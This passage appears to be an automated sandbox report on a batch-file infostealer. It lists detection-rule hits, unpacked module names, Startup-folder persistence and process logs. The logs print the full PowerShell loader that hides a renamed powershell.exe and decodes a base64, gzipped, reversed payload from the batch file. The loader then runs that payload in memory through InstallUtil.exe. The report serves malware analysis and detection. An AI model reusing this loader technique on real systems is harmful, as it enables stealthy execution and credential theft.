                    Source: Process Memory Space: MustFlush.bat.Dmf PID: 7520, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Found large BAT file
                    Source: ilZhNx3JAc.batStatic file information: 1411997
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08AA55B8 NtProtectVirtualMemory,7_2_08AA55B8
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08AA6E40 NtResumeThread,7_2_08AA6E40
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08AA55B2 NtProtectVirtualMemory,7_2_08AA55B2
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08AA6E38 NtResumeThread,7_2_08AA6E38
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_0419F1107_2_0419F110
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08A810E07_2_08A810E0
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08A836907_2_08A83690
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08A842107_2_08A84210
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08A824A97_2_08A824A9
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08A824B87_2_08A824B8
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08A810D27_2_08A810D2
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08A885A07_2_08A885A0
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08A885907_2_08A88590
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08A841FF7_2_08A841FF
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08A836807_2_08A83680
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08A842087_2_08A84208
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08A974907_2_08A97490
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08A9D5187_2_08A9D518
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08A9C6E87_2_08A9C6E8
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08A9C8397_2_08A9C839
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08A9D9777_2_08A9D977
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08A9F5207_2_08A9F520
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08A9D5077_2_08A9D507
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08A9C6DA7_2_08A9C6DA
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08AA2D787_2_08AA2D78
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08AA1E487_2_08AA1E48
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08AA61547_2_08AA6154
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08AA94887_2_08AA9488
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08AA94787_2_08AA9478
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08ABD0087_2_08ABD008
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08AB00407_2_08AB0040
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08AB19A37_2_08AB19A3
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08ABC3287_2_08ABC328
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08AB00117_2_08AB0011
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08AB53EF7_2_08AB53EF
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08ABBB687_2_08ABBB68
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08ABBB787_2_08ABBB78
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08AB64EF7_2_08AB64EF
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08AB54007_2_08AB5400
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08AB65007_2_08AB6500
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08ABCFF87_2_08ABCFF8
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08B7C9407_2_08B7C940
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08B787007_2_08B78700
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08B738BA7_2_08B738BA
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08B700067_2_08B70006
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08B700407_2_08B70040
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08B7DB487_2_08B7DB48
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08B7CC677_2_08B7CC67
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08B797887_2_08B79788
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08B7977A7_2_08B7977A
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08C700407_2_08C70040
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08C700197_2_08C70019
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08F0EB207_2_08F0EB20
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08F0DE887_2_08F0DE88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_02564AC08_2_02564AC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_02563EA88_2_02563EA8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_025641F08_2_025641F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_0256F6008_2_0256F600
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_05FDADC88_2_05FDADC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_05FDB4A88_2_05FDB4A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_05FD67808_2_05FD6780
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_05FDE9598_2_05FDE959
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_05FD88A88_2_05FD88A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_05FD00408_2_05FD0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_05FD33908_2_05FD3390
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_05FD8FFB8_2_05FD8FFB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_05FD59888_2_05FD5988
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_065B33D08_2_065B33D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_05FD00068_2_05FD0006
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfCode function: 16_2_00C3F11016_2_00C3F110
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfCode function: 16_2_06FB309816_2_06FB3098
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfCode function: 16_2_06FB305216_2_06FB3052
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfCode function: 16_2_0881C94016_2_0881C940
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfCode function: 16_2_0881870016_2_08818700
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfCode function: 16_2_088138BA16_2_088138BA
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfCode function: 16_2_0881DB4816_2_0881DB48
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfCode function: 16_2_0881CC6716_2_0881CC67
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfCode function: 16_2_0881001216_2_08810012
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfCode function: 16_2_0881004016_2_08810040
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfCode function: 16_2_0881978816_2_08819788
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfCode function: 16_2_0881977F16_2_0881977F
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfCode function: 16_2_0891000616_2_08910006
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfCode function: 16_2_0891004016_2_08910040
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfCode function: 16_2_08BAEB2016_2_08BAEB20
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfCode function: 16_2_08BADE8816_2_08BADE88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 18_2_01414AC018_2_01414AC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 18_2_01413EA818_2_01413EA8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 18_2_014141F018_2_014141F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 18_2_0141F6D818_2_0141F6D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 18_2_062B678018_2_062B6780
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 18_2_062BB4A818_2_062BB4A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 18_2_062B339018_2_062B3390
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 18_2_062B004018_2_062B0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 18_2_062BADC818_2_062BADC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 18_2_062B88A818_2_062B88A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 18_2_062BE95918_2_062BE959
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 18_2_062B8FFB18_2_062B8FFB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 18_2_062B598818_2_062B5988
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 18_2_06A333D018_2_06A333D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 18_2_062B001E18_2_062B001E
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs ilZhNx3JAc.bat
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1407359736.0000000008F39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename46da3e76-ea11-4ef3-9ed6-348209ad609f.exe4 vs ilZhNx3JAc.bat
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406826656.0000000008BE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs ilZhNx3JAc.bat
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.000000000584E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTECHNICAL-SPECIFICATION.exeP vs ilZhNx3JAc.bat
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNwxpdpym.dll" vs ilZhNx3JAc.bat
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs ilZhNx3JAc.bat
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1365527547.00000000006DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ilZhNx3JAc.bat
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004C96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename46da3e76-ea11-4ef3-9ed6-348209ad609f.exe4 vs ilZhNx3JAc.bat
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.000000000644C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs ilZhNx3JAc.bat
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004700000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs ilZhNx3JAc.bat
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000064EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs ilZhNx3JAc.bat
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs ilZhNx3JAc.bat
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1404676105.00000000088E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNwxpdpym.dll" vs ilZhNx3JAc.bat
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.00000000046A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs ilZhNx3JAc.bat
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004BC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs ilZhNx3JAc.bat
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000000.1343010484.0000000000A94000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs ilZhNx3JAc.bat
                    Source: ilZhNx3JAc.bat.Dmf.5.drBinary or memory string: OriginalFilenamePowerShell.EXEj% vs ilZhNx3JAc.bat
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 8.2.InstallUtil.exe.7a0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 16.2.MustFlush.bat.Dmf.6613670.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 16.2.MustFlush.bat.Dmf.6613670.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: Process Memory Space: ilZhNx3JAc.bat.Dmf PID: 6764, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: MustFlush.bat.Dmf PID: 7520, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.8000000.9.raw.unpack, ExceptionServer.csCryptographic APIs: 'CreateDecryptor'
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, ZTFEpdjP8zw.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, WnRNxU.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, 2njIk.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, I5ElxL.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, QQSiOsa4hPS.csCryptographic APIs: 'CreateDecryptor'
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, FdHU4eb83Z7.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, 3VzYbXLJt4.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, 3VzYbXLJt4.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, 3VzYbXLJt4.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, 3VzYbXLJt4.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winBAT@31/9@4/2
                    Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6648:120:WilError_03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7416:120:WilError_03
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ar35we2c.lka.ps1Jump to behavior
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ilZhNx3JAc.bat" "
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MustFlush.vbs"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\System32\chcp.comKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfFile read: C:\Users\user\Desktop\ilZhNx3JAc.batJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ilZhNx3JAc.bat" "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\Desktop\ilZhNx3JAc.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MustFlush.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\MustFlush.bat" "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\AppData\Roaming\MustFlush.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfJump to behavior
